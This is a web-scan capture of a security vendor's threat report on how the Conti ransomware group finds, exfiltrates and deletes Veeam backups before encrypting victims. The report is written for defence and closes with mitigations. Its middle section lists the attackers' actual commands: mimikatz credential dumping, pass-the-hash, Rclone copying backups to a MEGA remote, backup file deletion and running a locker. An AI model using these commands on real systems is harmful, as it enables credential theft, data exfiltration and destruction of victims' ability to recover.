urlscan.io logo urlscan.io
SecurityTrails logo

www.advintel.io Open in urlscan Pro
151.101.129.84  Public Scan

Back to summary
URL: https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love
Submission: On August 04 via api from US — Scanned from DE

Form analysis 1 forms found in the DOM

<form id="comp-kdhhfjzz" class="yBJuM">
  <div data-mesh-id="comp-kdhhfjzzinlineContent" data-testid="inline-content" class="">
    <div data-mesh-id="comp-kdhhfjzzinlineContent-gridContainer" data-testid="mesh-container-content">
      <div id="comp-kdhhfk0a" class="_1Q9if _3bcaz" data-testid="richTextElement">
        <h1 class="font_0" style="font-size:32px;">GET IN TOUCH</h1>
      </div>
      <div id="comp-kdhhfk0g" class="_2dBhC _2nVk2 _65cjg"><label for="input_comp-kdhhfk0g" class="aHD7c">Name</label>
        <div class="XRJUI"><input type="text" name="name" id="input_comp-kdhhfk0g" class="_1SOvY has-custom-focus" value="" placeholder="" required="" aria-required="true" maxlength="100"></div>
      </div>
      <div id="comp-kdhhfk0p" class="_2dBhC _2nVk2 _65cjg"><label for="input_comp-kdhhfk0p" class="aHD7c">Email</label>
        <div class="XRJUI"><input type="email" name="email" id="input_comp-kdhhfk0p" class="_1SOvY has-custom-focus" value="" placeholder="" required="" aria-required="true" pattern="^.+@.+\.[a-zA-Z]{2,63}$" maxlength="250"></div>
      </div>
      <div id="comp-kdp8wnh4" class="_2O-Ry">
        <ul class="xb9fU" aria-label="Social Bar">
          <li id="dataItem-kdp8wnjt1-comp-kdp8wnh4" class="_3lu8e">
            <a data-testid="linkElement" href="https://www.linkedin.com/company/advanced-intelligence-llc/" target="_blank" class="_26AQd"><wix-image id="img_0_comp-kdp8wnh4" class="_1-6YJ uWpzU" data-image-info="{&quot;containerId&quot;:&quot;dataItem-kdp8wnjt1-comp-kdp8wnh4&quot;,&quot;displayMode&quot;:&quot;fill&quot;,&quot;imageData&quot;:{&quot;width&quot;:200,&quot;height&quot;:200,&quot;uri&quot;:&quot;7528824071724d12a3e6c31eee0b40d4.png&quot;,&quot;displayMode&quot;:&quot;fill&quot;}}" data-has-bg-scroll-effect="" data-bg-effect-name="" data-image-zoomed="" data-has-ssr-src="" data-src="https://static.wixstatic.com/media/7528824071724d12a3e6c31eee0b40d4.png/v1/fill/w_24,h_24,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/7528824071724d12a3e6c31eee0b40d4.png"><img alt="Белый LinkedIn Иконка" style="width: 24px; height: 24px; object-fit: cover;"></wix-image></a>
          </li>
          <li id="dataItem-kdp8wnjw-comp-kdp8wnh4" class="_3lu8e">
            <a data-testid="linkElement" href="https://twitter.com/AdvIntel" target="_blank" class="_26AQd"><wix-image id="img_1_comp-kdp8wnh4" class="_1-6YJ uWpzU" data-image-info="{&quot;containerId&quot;:&quot;dataItem-kdp8wnjw-comp-kdp8wnh4&quot;,&quot;displayMode&quot;:&quot;fill&quot;,&quot;imageData&quot;:{&quot;width&quot;:200,&quot;height&quot;:200,&quot;uri&quot;:&quot;01ab6619093f45388d66736ec22e5885.png&quot;,&quot;displayMode&quot;:&quot;fill&quot;}}" data-has-bg-scroll-effect="" data-bg-effect-name="" data-image-zoomed="" data-has-ssr-src="" data-src="https://static.wixstatic.com/media/01ab6619093f45388d66736ec22e5885.png/v1/fill/w_24,h_24,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/01ab6619093f45388d66736ec22e5885.png"><img alt="Белый Twitter Иконка" style="width: 24px; height: 24px; object-fit: cover;"></wix-image></a>
          </li>
        </ul>
      </div>
      <div id="comp-kdhhfk0m" class="_2dBhC _2nVk2"><label for="input_comp-kdhhfk0m" class="aHD7c">Company</label>
        <div class="XRJUI"><input type="text" name="company" id="input_comp-kdhhfk0m" class="_1SOvY has-custom-focus" value="" placeholder="" aria-required="false" maxlength="100"></div>
      </div>
      <div id="comp-kdhhfk0t" class="_2dBhC _2nVk2"><label for="input_comp-kdhhfk0t" class="aHD7c">Phone</label>
        <div class="XRJUI"><input type="tel" name="phone" id="input_comp-kdhhfk0t" class="_1SOvY has-custom-focus" value="" placeholder="" aria-required="false" maxlength="50"></div>
      </div>
      <div id="comp-kdhhfk0x" class="bItEI _1mQNr"><label for="textarea_comp-kdhhfk0x" class="_20uhs">Type your message here...</label><textarea id="textarea_comp-kdhhfk0x" class="_1VWbH has-custom-focus" placeholder=""
          aria-required="false"></textarea></div>
      <div id="comp-kdhhfk15" class="_2Hij5 _3bcaz" data-testid="richTextElement">
        <p class="font_8" style="font-size:14px; text-align:center;"><span style="font-style:italic;"><span style="font-size:14px;"><span style="color:#68B04D;">Thanks! We will reach out to you shortly!</span></span></span></p>
      </div><label id="comp-kdhjlk1h" data-testid="checkbox" class="_1inVN"><input type="checkbox" data-testid="input" class="_3ESMu" value="checked" required=""><span class="dt3JT"></span>
        <div class="_2v4A7"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 7.4 5.686">
            <path d="M2.55 5.686c-.017 0-.034 0-.05-.002a.7.7 0 01-.518-.29l-1.85-2.57a.7.7 0 111.136-.818L2.63 3.897 6.197.213a.7.7 0 011.006.974l-4.15 4.286a.7.7 0 01-.503.213z"></path>
          </svg></div>
        <div class="x6FDj"><span data-testid="text" class="_1Avq3">I accept the terms and conditions</span>
          <div data-testid="linkElement" class="_1g2U2"><span data-testid="linkLabel" class="_3laNP"></span></div>
        </div>
      </label>
      <div id="comp-kdhhfk11" aria-disabled="false" class="_2UgQw"><button aria-disabled="false" data-testid="buttonElement" class="_1fbEI"><span class="_1Qjd7">Submit</span></button></div>
    </div>
  </div>
</form>

Text Content

 
Skip to Main Content


 * Vegas 2022

 * Products

 * Technology

 * Healthcare Sector

 * About

 * Press

 * Careers

 * Blog

 * Webinar

 * Contact

 * More


Use tab to navigate through the menu items.

Search

 * * Sep 29, 2021
   * 
   * 5 min read




BACKUP “REMOVAL” SOLUTIONS - FROM CONTI RANSOMWARE WITH LOVE

Updated: Oct 7, 2021

By Vitali Kremez & Yelisey Boguslavskiy





This redacted report is based on our actual proactive victim breach intelligence
and subsequent incident response (not a simulated or sandbox environment)
identified via unique high-value Conti ransomware collections at AdvIntel via
our product “Andariel.”






Key Takeaways



 * Backups are a major obstacle for any ransomware operation as they allow the
   victim to resume business by performing data recovery instead of paying
   ransom to the criminals.

 * Cyber groups specifically target backup solutions in order to ensure that the
   victim has no other option except for paying the ransom. Conti group is
   particularly methodical in developing and implementing backup removal
   techniques.

 * Conti’s tactics are based on utilizing the skills of their network intruders
   or “pentesters” in order to ensure to target on-premise and cloud backup
   solutions. Conti hunts for Veeam privileged users and services and leverages
   to access, exfiltrate, remove and encrypt backups to ensure ransomware
   breaches are un-”backupable”. This way, Conti simultaneously exfiltrated the
   data for further victim blackmailing, while leaving the victim with no
   chances to quickly recover their files as the backups are removed.

 * Maintaining developed protocols of access rights hierarchy, network security,
   and password hygiene, as well as systemic network monitoring aimed at
   spotting abnormal network behavior may significantly reduce the chances of
   Conti successfully removing backups. Secure backup solutions and mitigations
   listed will enable any possible victims to leave Conti without their demanded
   ransom money.

Introduction






Conti is a top-tier Russian-speaking ransomware group specializing in double
extortion operations of simultaneous data encryption and data exfiltration.
Though Conti does utilize the blackmailing aspect of data exfiltration,
threatening the victims to publish stolen files, if the ransom is not paid, the
main leverage in Conti negotiations is data encryption based on our deeper
visibility.






According to AdvIntel sensitive source intelligence, Conti builds their
negotiations strategies based on the premise that the majority of targets who
pay the ransom are motivated primarily by the need to restore their data while
preventing data publishing from being is their secondary goal. If the victim has
the ability to restore the files via backups, the chances of successful ransom
payment to Conti will be minimized, even despite the fact that the risk of data
publishing persists.






As a result, in order to ensure payments, Conti became strategic in addressing
this major obstacle and developed a methodology to remove backups in order to
force ransomware payment.






Conti’s Holistic Vision for Attack Anatomy






Conti’s “backup removal solutions” begin on the team development level. While
selecting network intruders for their divisions also known as “teams”, Conti is
particularly clear that experience related to backup identification,
localization, and deactivation is among their top priorities for a successful
pentester. This backup focus implemented within the partnership-building process
enables Conti to assemble teams, equipped with knowledge and skills aimed at
backup removal.






The most novel tactics developed by such teams are centered around Veeam backup
software. Veeam is a backup, recovery, and data management solutions platform
for cloud, virtual, and physical environments.








Weaponized Creativity






Cobalt Strike via Corporation Breach Study






Routinely, Conti initiates their attacks via spam messages with direct Cobalt
Strike beacon backdoor delivery. The targeted spam campaigns are meticulously
designed on selective research of the prospective target, adverse media about
them, their executives, and employees. These campaigns are set to ensure that
the spam emails are being opened and Cobalt Strike beacons are executed.






Conti maintains their approach and attack methods during the next step of attack
when they leverage the Atera module as well as Ngrok application to establish
persistence. As previously reported by AdvIntel Conti is leveraging a legitimate
remote management agent Atera to survive possible Cobalt Strike detections from
the endpoint detection and response platform. Relying on the legitimate tool to
achieve persistence is a core idea leverage by the ransomware pentesting team.
The same can be applied to Ngrok, which Conti leverages in order to establish a
tunnel to the localhost which will serve as a path for data exfiltration.








The data exfiltration itself is typically done via Rclone weaponization. Rclone
config is created and an external location (e.g, MEGA or FTP) for data
synchronization (data cloning) is established. Conti will prioritize data based
on network shares with a specific aim at documentation related to finance,
legal, accounting, insurance, and Information Technology.






Then, finally, Conti pursues that the victim will not be able to recover - they
lock the system and the backups and make sure the backups are removed. This can
be illustrated by the 2021 Cobalt Strike Beacon Backdoor campaign which AdvIntel
observed.





Cobalt Strike Backup Removal Sequence






I. Mimikatz and DCsync of Veeam users






run mimikatz's @lsadump::dcsync /domain:VICTIMORG.local /all /csv






II. Find privileged users for Veeam service



 * SharpView.exe Find-DomainUserLocation -UserIdentity svc-Veeam

 * SharpView.exe Get-DomainGPOComputerLocalGroupMapping -ComputerName svc-Veeam

 * SharpView.exe Get-NetLoggedon -ComputerName svc-Veeam

III. Impersonate a privileged backup user and establish Veeam backup privileges






a. Clear text password and create a token if the password can be obtained as
clear text



 * make_token VICTIMORG.local\svc-Veeam <PASSWORD>

b. Pass-The-Hash technnque:



 * run mimikatz's sekurlsa::pth /user:svc-Veeam /domain:VICTIMORG.local
   /ntlm:HASH /run:"%COMSPEC% /c echo <VALUE> > \\.\pipe\<VALUE>"

IV. Download Veeam backups configurations



 * download
   c:\Users\administrator.VICTIMORG\AppData\Roaming\Veeam_Software_Group_GmbH\Veeam.EndPoint.Tray.exe_Url_<ID>\1.0.0.0\user.config

V. Download Veeam Guest Helper logs



 * download
   \\VICTIMORG.local\C$\ProgramData\Veeam\Backup\VeeamGuestHelper_<DATE>.log

VI. Exfiltration Veeam Backups via Rclone



 * shell rclone.exe copy --max-age 2y "\\VEEAM.VICTIMORG.local\" mega:VEEAM -q
   --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7
   --bwlimit 10M

VII. Manual removal of Veeam Backups .vbk



 * rm D:\VeeamBackup\VICTIMORG backup\VICTIMORG<DATE>.vbk

VIII. Conti locker of Veeam-designated local domains



 * shell start C:\locker.exe -m -net -size 10 -nomutex -p
   \\VEEAM.VICTIMORG.local\<DRIVE>$\Backups

As demonstrated above, with the Veeam account compromise Conti has a method to
deal with backup software to “force” ransom payment.







Veeam Mitigation & Statement on How to Harden Installations:







When the attackers have access to the domain admin account there is little
[Veeam] can do to protect our installation. That's why [Veeam] usually recommend
using a separate domain to run backup software, this could protect [Veeam]
instance in case of the primary domain is compromised.







Another approach to protect from ransomware would be to use immutable
repositories, they can be considered safe (if configured correctly), because
they allow only appending new data, not altering/purging existing backups.







Mitigations & Recommendation






To prevent Conti backup removal attacks, a holistic mitigation framework should
be applied:



 1. To prevent the attack initiations, employee training, and email security
    protocols should be implemented. Conti uses very developed social
    engineering techniques in order to convince the victim employees that the
    targeted emails are legitimated.

 2. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an
    alternative means for attack initiation. Tracking externally exposed
    endpoints is therefore critical.

 3. To prevent lateral movement, network hierarchy protocols and should be
    implemented with network segregation and decentralization.

 4. Audit and/or block command-line interpreters by using whitelisting tools,
    like AppLocker or Software Restriction Policies with the focus on any
    suspicious “curl” command and unauthorized “.msi” installer scripts
    particularly those from C:\ProgramData and C:\Temp directory

 5. Rclone and other data exfiltration command-line interface activities can be
    captured through proper logging of process execution with command-line
    arguments.

 6. Special security protocol, password update, and account security measures
    for Veeam should be implemented to prevent Veeam account takeover. Enabled
    backups tremendously decrease Conti’s ransom demands and can likely lead to
    data recovery with zero payments to the Conti collective.

Disrupt ransomware attacks & prevent data stealing with AdvIntel’s threat
disruption solutions. Sign up for AdvIntel services and get the most actionable
intel on impending ransomware attacks, adversarial preparations for data
stealing, and ongoing network investigation operations by the most elite
cybercrime collectives.






 * Ransomware




RECENT POSTS

See All

Ransomware Advisory: Log4Shell Exploitation for Initial Access & Lateral
Movement

Corporate Loader "Emotet": History of "X" Project Return for Ransomware

Groove VS Babuk; Groove Ransom Manifesto & RAMP Underground Platform Secret
Inner Workings




GET IN TOUCH

Name

Email

 * 
 * 

Company

Phone

Type your message here...

Thanks! We will reach out to you shortly!


I accept the terms and conditions

Submit
Terms of Service
Privacy Policy

 
AcceptSettings
We use cookies on our website to see how you interact with it. By accepting, you
agree to our use of such cookies.Privacy Policy